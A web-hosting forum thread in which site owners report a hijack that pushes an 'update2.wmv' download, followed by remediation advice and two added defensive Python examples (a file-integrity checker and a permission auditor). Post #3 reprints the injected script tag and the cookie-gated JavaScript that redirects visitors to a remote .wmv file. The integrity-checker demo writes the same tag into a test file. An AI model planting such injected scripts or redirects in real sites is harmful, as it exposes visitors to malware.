Thread: possible forum hijack

  1. #1 (Virginia Beach, VA)
    Hello,

    I have had a few reports from forum members at www.comandosupremo.com/forum of a media file named update2.wmv popping up on the forum for download. The media file would also show a picture of an elephant. I have never put this file in the forum and I believe it may be some type of virus or trojan.

    I have also noticed my topics_anywhere.php no longer works on www.comandosupremo.com. This seemed to quit working around the same time the forum experienced trouble.

    Here is the code for the JavaScript:
    <script language="JavaScript" type="text/javascript" src="http://www.comandosupremo.com/forum/topics_anywhere.php?mode=show&f=a&n=5&r=y&b=squ&lpb=0&lpd=0&lpi=y"></script>

    Any help would be most appreciated!

    Jim

  2. #2 Mirzabah (Melbourne, Australia)
    I can confirm that when I visited your site, it tried to download a file called update2.wmv - without me asking for it. This only happened the first time - subsequent re-loads didn't do anything out of the ordinary. If you haven't already done so, I would strongly recommend changing your FTP and MySQL passwords and upgrading to the latest version of phpBB.

  3. #3 satis (Dallas)
    I got it too. At the top of the main forum page is this line:

    Code:
    <script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>
    I pulled up that page, which shows the following:
    Code:
    <!--
        var currentDate = new Date();
        var adRecurrence = "daily";
        var adId = "a1087804322";
        var adExpiration = 0;
        var retry = 2;
        var flag = 0;
        var obj = null;

        // cookie lifetime: 36 hours from now
        currentDate.setTime(currentDate.getTime() + (1*36*60*60*1000));
        adExpiration = currentDate.toGMTString();

        function SetCookie(sName, sValue, sExpire) {
            var expireCode = "";
            if (sExpire) { expireCode = "expires=" + sExpire + ";" }
            document.cookie = sName + "=" + escape(sValue) + ";" + expireCode
        }

        function GetCookie(sName) {
            var aCookie = document.cookie.split("; ");
            for (var i = 0; i < aCookie.length; i++) {
                var aCrumb = aCookie[i].split("=");
                if (sName == aCrumb[0]) { return unescape(aCrumb[1]); }
            }
            return null;
        }

        // one second after being called, navigate the page to the .wmv download
        function upop() {
            setTimeout("location.href = 'http://www.dlfree.com/Update2.wmv'",1000);
        }

        // only fire if the marker cookie is absent, then set it: this is why the
        // download appears on the first visit and not on reloads for the next 36 hours
        if (!GetCookie(adId)) {
            SetCookie(adId, "1", adExpiration);
            setTimeout("upop()", 10*1000);
        }
    //-->
    obviously that's the source of the popup. The question is, is this something you added to your forum? If so...just un-add it and you'll probably be fine. If not, then at least one of your forum files has been edited, which is typically a BAD sign. If someone was able to alter one of your files, there's no telling what else they might have done. At a minimum, check your user list and make sure there aren't any new admins you don't know about, and change your password.

  4. #4 dvoges (Guest)

    update2.wmv site hijack

    I have likewise been hijacked at http://stringersystems.com. This is a PostNuke site using Xanthia themes.

    I found that all the files in the active theme folder had been touched on 23Nov05 and the script appended.

  5. #5 satis (Dallas)
    Ah, the files were appended? If that's the case, I'd consider your forum, site, and database compromised. I would highly recommend you audit your user tables, as well as upgrade to the latest release of your forum and/or PostNuke versions. Not a happy occurrence, I'm sure, but I've been through a similar procedure and it's not horribly complex. Much better than not knowing if someone else owns your website now. Be sure to change all your login information for anything that matters.

  6. #6 linnetwoods (Mallorca, Balearic Islands)
    Is there some sort of script that one can use to check for changes just before making any oneself, to see if someone else has done so? i.e. After you finished making changes on your site, you would run the script to update it, so it knew what should be there. It would tell you what changes it had found and you would OK them. Then, before making the next set of changes, you would run the script again, to see whether it reported any changes that had been made (by someone else, obviously) since your last session. At that point you would need the option to see the changes and maybe even get some info on how they got there and the option to undo all changes made since the last official update... Does it exist? Could it be created by someone who understands these mysteries that escape us ordinary web-manglers?
    The pen is mightier than the sword. Except when the other guy has the sword
    LinnetWoods.com

  7. #7 IanS (Washington, UK)
    A bit like the md5 system (now defunct) for passing ISO images. The problem I see with this is that although the scripts won't change, with blogs and other dynamic data around the hash totals would also change unless you could specify the files to include (or exclude).
    This is a Powweb customer
    helping Powweb customer forum.

    I am a customer just like you!!

    Some matters can only be answered by staff or support.
    Give it a go - ask here first!

  8. #8 satis (Dallas)
    You could do it with md5. MD5 still works, it's just 'hackable'. For something like a checksum hash I'm sure it'd still be useful.

    You could probably set up a PHP page with a cron job: have it fopen all the files, stuff all the contents into an md5, then store the hash somewhere (like a DB table or a flat file). Actually, a DB table would be great: one row per day per file or something. Then have it compare the previous day's hashes with the current day's and raise a warning if they're different.

    As long as you're doing it on the static background PHP pages (and not cached templates or anything truly dynamic) that'd be a great way to do it. Good idea, IanS. Now to trick Extras or someone into coding it. hehe.
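
    The scheme satis sketches above (hash every static file, store the hashes, compare the next run) as an added worked example; this is not code from this thread or from any poster. It uses a JSON manifest instead of a DB table and SHA-256 instead of MD5, and skips directories that a forum rewrites on its own, which is IanS's objection about dynamic data. The excluded directory names, the file and directory layout in the demo, and the dropped.php filename are assumptions; the domainstat.net script tag is the one satis found.

```python
import hashlib
import json
import os
import tempfile

# Assumed names of directories a forum/CMS rewrites on its own (cache, uploads, ...).
# They are skipped so that legitimate churn does not bury a real modification.
DEFAULT_EXCLUDES = frozenset({"cache", "templates_c", "uploads", "logs", "tmp"})


def file_digest(path):
    """SHA-256 of one file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, excludes=DEFAULT_EXCLUDES):
    """Map relative path -> digest for every file under root outside the excluded dirs."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if d not in excludes)
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = file_digest(full)
    return manifest


def compare_manifests(baseline, current):
    """Classify the differences between the stored baseline and the live tree."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def check_site(root, manifest_path, excludes=DEFAULT_EXCLUDES):
    """Compare the live tree with the stored baseline.

    On the first run there is no baseline yet: write one and report no changes.
    After making legitimate changes yourself, delete the manifest so the next
    run re-baselines against your version.
    """
    current = build_manifest(root, excludes)
    if not os.path.exists(manifest_path):
        with open(manifest_path, "w") as f:
            json.dump(current, f, indent=1, sort_keys=True)
        return {"added": [], "removed": [], "modified": [], "baseline_created": True}
    with open(manifest_path) as f:
        baseline = json.load(f)
    report = compare_manifests(baseline, current)
    report["baseline_created"] = False
    return report


def demo():
    """Constructed scenario: baseline a tiny fake forum, then simulate the injection."""
    root = tempfile.mkdtemp()
    manifest_path = os.path.join(tempfile.mkdtemp(), "manifest.json")  # kept outside the web root
    tpl_dir = os.path.join(root, "templates", "subSilver")
    os.makedirs(tpl_dir)
    os.makedirs(os.path.join(root, "cache"))
    header = os.path.join(tpl_dir, "overall_header.tpl")
    with open(header, "w") as f:
        f.write("<html><head><title>Forum</title></head>\n")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'forum'; ?>\n")
    check_site(root, manifest_path)  # first run: writes the baseline

    # What the thread describes: a script tag appended to a template, a new file
    # dropped next to it (hypothetical name), and ordinary cache churn that must not alert.
    with open(header, "a") as f:
        f.write("<script src='http://domainstat.net/stat.php'></script>\n")
    with open(os.path.join(root, "templates", "dropped.php"), "w") as f:
        f.write("<?php /* hypothetical attacker-dropped file */ ?>\n")
    with open(os.path.join(root, "cache", "page_1.html"), "w") as f:
        f.write("cached output that changes on every request\n")
    return check_site(root, manifest_path)


if __name__ == "__main__":
    for kind, paths in demo().items():
        if kind != "baseline_created":
            for path in paths:
                print(f"{kind:>8}: {path}")
```

    Run it from cron and mail yourself the report. Keep the manifest and the script itself outside the web root (or on another machine): whoever can append to your templates can just as easily rewrite a manifest stored beside them. It only tells you after the fact, which is the limitation raised in the next post, so it complements rather than replaces tight permissions and current forum software.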

  9. #9 on hiatus (Canada)
    Quote Originally Posted by satis
    Now to trick Extras or someone into coding it. hehe.
    I will not write something like that.
    It's not effective.

    I mean, it only tries to detect an already-cracked situation, and it's too late.
    Also, it's going to be extremely heavy; some people will abuse it and harm everyone.

    It's better to detect bad permission settings (666, 777, ...),
    unsafe scripts, and other vulnerabilities BEFORE being cracked.

    But I don't think I will write that either, as it's going to be a heavy script
    (although not as heavy as checking md5 or CRC), and people who need them
    will abuse the script, most probably.


    The real problem is, let's say, the lack of education.
    Constructing safe site is easy.

    The ten commandments for safer web site (for PowWeb users)
    1. Use safer permission setting of 710 instead of 755 for all directories.
    2. Use even safer permission of 700 for directories not directly accessed by Apache.
    3. Use 750 only for directories you want to use Apache's default directory listing.

    4. Use safer permission of 600 instead of 640 for ALL PHP scripts.
    5. Use safer permission of 700 instead of 755 for ALL CGI scripts.

    6. Password protect ALL scripts other than you want general public to access,
    including webstats provided by PowWeb.

    7. Avoid using unsafe scripts: Matt's Formmail.pl, phpBB2, php-Nuke,
    and many other PHP and CGI scripts. I guess 90% of cracking happens this way.

    Remember that PHP is a vulnerable, buggy, and risky language
    and scripts written with it are often very vulnerable, buggy and risky.

    Static content requires much less maintenance and is a lot safer,
    and can be as cool as stupid CMS/BLOG construction.

    8. Check the IP of last access for OPS, FTP, and mail, regularly.
    9. Check your raw log to see suspicious access and cracking attempts.

    10. Keep your PC safe. If your PC is compromised, bad people can obtain
    access to your site and many many personal information.

    DO NOT trust BIG corporation, like MS, SONY, and so on.
    These guys often create stupid products, but they can be clever in deceiving naive users.

    Stay away from hyped, fancy, needless, or heavy features.
    Stay away from IE/OE, html mail, Javascript, and so on.
    Now, I think what we need is something to replace PHP and its badly written apps.
    PHP is a cancer of shared hosting in terms of security and resource usage.
    (On dedicated server or VPS, it's not as bad.)

    Some PHP users are dreaming that Ruby on Rails will be the savior, but I don't think so.
    It's still too heavy and apps will be written by same PHP coders who have been
    writing unsafe inefficient scripts that the end result will be similar.

    I've experimented with OCaml and found it pretty fast and small.
    And I will write replacement Form mailer and simple CMS with it, probably.


    The main problem is the ignorance, again.
    People are not aware of how much they are suffering from bad hype around PHP,
    just like they are suffering from unsafe MS products such as IE/OE.

    And I don't foresee any change in this area very soon, unfortunately.
    I've been telling this many times in this forum.
    Yet most people are still using unsafe permission and vulnerable scripts without protection.
    It's nearly "normal" and inevitable to get cracked.

  10. #10 linnetwoods (Mallorca, Balearic Islands)
    I know nothing about anything but I came to the conclusion (borne out by a quick glance at the proportion of threads with problems on php on this very forum!) that I should forget trying to use php or MySQL and stick with the simplicity of html, when building some shops for a client. He is really pleased with the results, everything works and the shops are unique instead of being very much like a zillion others. We used PayPal as they have now decided that people can pay by credit card without having to join.

    I can see that for a forum or chat room there is probably no alternative but shops and galleries can be made in html without too much slog and they aren't bug-ridden.

  11. #11 on hiatus (Canada)
    I wrote a small script that checks for unsafe permissions and corrects them.

    To use, install extratools.php (automatic installer)
    http://check-these.info/tools/extratools_php.txt

    Then, click on "Install/Update 666.cgi".
    When installation is finished, click on the link "666.cgi" or "Run 666.cgi".

    This will prevent at least simple cracking done via a directory with unsafe permissions,
    like some people in this thread have suffered.

    Note:
    If you have a site with lots of files, it may timeout.
    It's a slow script, and it won't cause resource abuse, AFAIK.
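
    A permission audit in the spirit of the "ten commandments" in post #9 and the 666.cgi checker described in post #11, as an added example; this is not 666.cgi and not any poster's code. It walks a web root, reports anything writable by group or by everyone (the 666/777 cases), flags symlinks and setuid/setgid files, and with fix=True clears the group/other write bits. It deliberately does not apply the 710/600 scheme from post #9: whether those modes work depends on which user the web server runs your scripts as, which is a property of the host, whereas stripping write bits from group and others is safe anywhere. The file names in the demo are constructed.

```python
import os
import stat
import tempfile


def findings_for(mode):
    """Describe what is wrong with an st_mode; an empty list means nothing to report."""
    out = []
    if mode & stat.S_IWOTH:
        out.append("world-writable")          # the 666 / 777 case from the thread
    elif mode & stat.S_IWGRP:
        out.append("group-writable")          # 664 / 775: other accounts in the group can edit it
    if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
        out.append("setuid/setgid")
    return out


def safe_mode(mode):
    """The same permission bits with group and other write removed (666 -> 644, 777 -> 755)."""
    return stat.S_IMODE(mode) & ~(stat.S_IWGRP | stat.S_IWOTH)


def audit_tree(root, fix=False):
    """Return {relative path: [findings]} for everything below root.

    With fix=True the offending entries are chmod'ed to safe_mode(). Symlinks are
    reported but never chmod'ed, because chmod would follow them to the target.
    """
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in sorted(dirnames + filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                report[rel] = ["symlink (check its target)"]
                continue
            problems = findings_for(st.st_mode)
            if problems:
                report[rel] = problems
                if fix:
                    os.chmod(full, safe_mode(st.st_mode))
    return report


def demo():
    """Constructed tree: a sane 644 file, a 666 file, a 777 directory and a 775 directory."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "images"))
    os.mkdir(os.path.join(root, "includes"))
    for name in ("index.php", "config.php"):
        open(os.path.join(root, name), "w").close()
    os.chmod(os.path.join(root, "index.php"), 0o644)
    os.chmod(os.path.join(root, "config.php"), 0o666)
    os.chmod(os.path.join(root, "images"), 0o777)
    os.chmod(os.path.join(root, "includes"), 0o775)
    before = audit_tree(root)
    audit_tree(root, fix=True)
    after = audit_tree(root)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    for path, problems in before.items():
        print(f"{path}: {', '.join(problems)}")
    print("after fix:", after or "nothing to report")
```

    Run it in report-only mode first and read the list; then run with fix=True. On a large site it is I/O bound like the 666.cgi note above, so schedule it rather than running it on every page load.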
